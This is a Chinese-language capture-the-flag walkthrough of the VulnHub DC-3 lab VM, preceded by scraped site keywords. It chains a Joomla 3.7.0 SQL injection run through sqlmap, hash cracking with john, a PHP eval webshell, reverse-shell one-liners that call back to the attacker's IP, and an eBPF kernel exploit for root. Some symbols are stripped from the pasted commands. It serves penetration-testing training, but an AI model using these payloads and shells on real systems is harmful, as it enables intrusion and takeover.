路由器做php网站,上海高端网站定,排版设计素材,台安人才网目录 0x00 准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用1. joomla漏洞查找2. SQL注入漏洞3. 破解hash4. 上传一句话木马5. 蚁剑连接shell6. 反弹shell7. 提权 0x04 总结 0x00 准备 下载链接#xff1a;https://download.vulnhub.com/dc/DC-3-2.zip
介绍#… 目录 0x00 准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用1. joomla漏洞查找2. SQL注入漏洞3. 破解hash4. 上传一句话木马5. 蚁剑连接shell6. 反弹shell7. 提权 0x04 总结 0x00 准备 下载链接https://download.vulnhub.com/dc/DC-3-2.zip
介绍 As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
重点只有一个flag。
0x01 主机信息收集 两台机器都是NAT模式。
执行命令ifconfig
kali本机的ip192.168.179.128网卡eth0
发现目标主机ipnetdiscover -i eth0 -r 192.168.179.0/24
目标主机ip192.168.179.129 探测目标主机开放端口nmap -sS -sV -n -A -p- 192.168.179.129
只开放了80端口运行的Apache2.4.18服务并且使用了Joomla的CMS。 0x02 站点信息收集 访问这个站点看一下基本信息基本前面都获取到了。 看一下站点目录dirsearch -u 192.168.179.129 -e * 发现了后台入口192.168.179.129/administrator 这个cms不能确定版本。
一个思路是访问上面扫描出来的目录192.168.179.129/README.txt 另一个思路是用这个cms相关的扫描工具进行扫描执行命令joomscan -u http://192.168.179.129 通过以上两种方法都可以得到cms的版本是joomla3.7.0。
0x03 漏洞查找与利用 1. joomla漏洞查找 执行命令搜索相关的漏洞searchsploit joomla 3.7.0 有个sql注入的漏洞查看一下42033.txtcat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917URL Vulnerable: http://localhost/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml%27Using Sqlmap:sqlmap -u http://localhost/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering]Parameter: list[fullordering] (GET)Type: boolean-based blindTitle: Boolean-based blind - Parameter replace (DUAL)Payload: optioncom_fieldsviewfieldslayoutmodallist[fullordering](CASE WHEN (15731573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)Type: error-basedTitle: MySQL 5.0 error-based - Parameter replace (FLOOR)Payload: optioncom_fieldsviewfieldslayoutmodallist[fullordering](SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(66006600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Type: AND/OR time-based blindTitle: MySQL 5.0.12 time-based blind - Parameter replace (substraction)Payload: optioncom_fieldsviewfieldslayoutmodallist[fullordering](SELECT * FROM (SELECT(SLEEP(5)))GDiu) 2. SQL注入漏洞 根据上面给出的相关信息URL Vulnerable就是存在漏洞的点将localhost换成是目标主机的iphttp://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml%27 27%是URL编码中的单引号
用浏览器访问上述地址。 再去掉单引号访问一下http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml 可以看到访问两个不同的链接页面回显不一样并且返回了SQL相关的报错说明 list[fullordering]这个参数确实存在和数据库的交互存在SQL注入漏洞。上面也给出了Sqlmap的语句sqlmap -u http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering]
其中–risk3指定测试的风险等级–level5指定检测的等级这时会检测HOST头包含的payload最多–random-agent会从从sqlmap自带的文本文件中随机选择一个user-agent不带这个参数时sqlmap有个默认的User-Agent当 --level设置为3或者更高时sqlmap会自动检测User-Agent是否存在注入漏洞–dbs是枚举数据库的名字-p是指定扫描的参数这里是list[fullordering] 。
用sqlmap跑一下上面的语句跑的过程中有三次询问 最后可以看到有五个数据库的名字。使用 --current-db 来获取当前数据库的名字完整的sqlmap语句sqlmap -u http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --current-db 当前数据库是 joomladb再用 -D joomladb --tables 来跑表的名字完整的语句sqlmap -u http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb --tables
通过上面的语句可以跑出来一个#__users 表。 再用 -D joomladb -T “#__users” --columns 来跑列的名字完整的语句sqlmap -u http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users --columns
跑的过程中有三次输入
第一次you have not declared cookie(s), while server wants to set its own (‘460ada11b31d3c5e5ca6e58fd5d3de27vn4pjqvr2pp…covug51rl0’). Do you want to use those [Y/n] \y
第二次do you want to use common column existence check? [y/N/q] y
第三次please enter number of threads? [Enter for 1 (current)] 2
结果如下 可以看到有username列和password列再用 -D joomladb -T #__users -C name,password --dump 来跑这两列的内容完整的语句sqlmap -u http://192.168.179.129/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml -D joomladb -T #__users -C name,password --dump 用户名admin
密码$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 3. 破解hash 密码是一段加密的hash可以用kali自带的john来破解这段hash。
将这段密文存入a.txt文件中再利用命令john a.txt来查看结果。 4. 上传一句话木马 得到密码为snoopy。利用admin/snoopy登录后台http://192.168.179.129/administrator/。
多浏览一下可以找到一个上传php文件的地方。路径Extensions-Templates-Templates的Beez3 这里可以创建一个php文件。
先选择html这个目录就可以在这个目录下面创建木马文件后面比较好找路径。填写好创建的文件的名字和文件类型点击create。 输入文件内容?php eval($_POST[123]);echo Hello 123; ?
点击左上角的save按钮。 Joomla的目录结构中templates是模板文件夹直接存在于根目录下。我们创建的木马文件是beez3这个模板的html目录下的。所以木马文件的路径考虑是http://192.168.179.129/templates/beez3/html/123.php。访问一下页面回显 Hello 123说明访问成功。 5. 蚁剑连接shell 用蚁剑连接一下目标服务器。上下编码都选择base64 6. 反弹shell 连接上以后右键打开终端。
在kali中监听4444端口执行命令nc -lvvp 4444
在服务器的终端中执行命令nc -e /bin/bash 192.168.179.128 4444
结果目标服务器的nc没有-e。 考虑其他的反弹shell的方式。
在获取webshell的情况下常用的反弹shell的方式
# 本地监听4444 端口
ncat -lnvp 4444# 服务端反弹命令中都是本地的ip)
nc -e /bin/bash 192.168.179.128 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.179.128 4444/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 21|nc 192.168.179.128 4444/tmp/f
/bin/sh -i /dev/tcp/192.168.179.128/4444 01 找个不用-e的。
在服务器的终端执行命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.179.128 4444/tmp/f 在kali中可以看到监听端口成功。 进入交互式shell执行命令python -c import pty; pty.spawn(/bin/bash) 7. 提权 依旧是先看有没有可以利用的命令执行sudo -l
没有权限需要密码。 换个思路考虑linux系统内核相关的漏洞。
查看linux内核版本uname -a
查看linux发行版本cat /etc/issue
是2016年的Ubuntu 16.04。 在kali中另外打开一个终端搜索相关的可以利用的漏洞脚本执行命令searchsploit ubuntu 16.04
虽然有很多但是尝试了以后发现39772最好用。Privilege Escalation 特权升级 查看使用文档执行命令cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id808In Linux 4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:/* look for pseudo eBPF instructions that access map FDs and* replace them with actual map pointers*/static int replace_map_fd_with_map_ptr(struct verifier_env *env){struct bpf_insn *insn env-prog-insnsi;int insn_cnt env-prog-len;int i, j;for (i 0; i insn_cnt; i, insn) {[checks for bad instructions]if (insn[0].code (BPF_LD | BPF_IMM | BPF_DW)) {struct bpf_map *map;struct fd f;[checks for bad instructions]f fdget(insn-imm);map __bpf_map_get(f);if (IS_ERR(map)) {verbose(fd %d is not pointing to valid bpf_map\n,insn-imm);fdput(f);return PTR_ERR(map);}[...]}}[...]}__bpf_map_get contains the following code:/* if error is returned, fd is released.* On success caller should complete fd access with matching fdput()*/
struct bpf_map *__bpf_map_get(struct fd f)
{if (!f.file)return ERR_PTR(-EBADF);if (f.file-f_op ! bpf_map_fops) {fdput(f);return ERR_PTR(-EINVAL);}return f.file-private_data;
}The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the files writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.There are two problems with this approach:The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.An exploit that puts all this together is in exploit.tar. Usage:userhost:~/ebpf_mapfd_doubleput$ ./compile.sh
userhost:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, youll have a root shell in 60 seconds.
suid file detected, launching rootshell...
we have root privs now...
roothost:~/ebpf_mapfd_doubleput# id
uid0(root) gid0(root) groups0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)This exploit was tested on a Ubuntu 16.04 Desktop system.Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 告诉我们可以使用exp提权并且给出了下载链接。
在kali中下载执行命令wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip 解压unzip -n 39227.zip -n可以不覆盖原有的文件。 解压以后发现有两个压缩文件从命令中可以看出提权工具应该在exploit.tar中。
我这里想在kali本机把文件解压然后再利用蚁剑上传到目标主机的上传的时候发现权限不允许。所以还是将exploit.tar这个文件通过蚁剑上传到/var/www/html/templates/beez3/html目录下。 在蚁剑的目标服务器终端中解压上传的文件执行命令tar -xvf exploit.tar 再根据 39772.txt 给出的提示。
进入目录cd ebpf_mapfd_doubleput_exploit
再执行 ./compile.sh
再执行 ./doubleput 0x04 总结 主机信息收集
netdiscover发现目标主机ip。nmap探测目标主机的开放端口和服务。
站点信息收集
dirsearch探索站点目录发现后台入口。确定cms版本joomla3.7.0。
漏洞利用
searchsploit搜索joomla相关漏洞CVE-2017-8917。sqlmap跑数据库得到管理员的名字和密码。john破解hash。php一句话木马。反弹shell。利用linux内核相关漏洞提权。
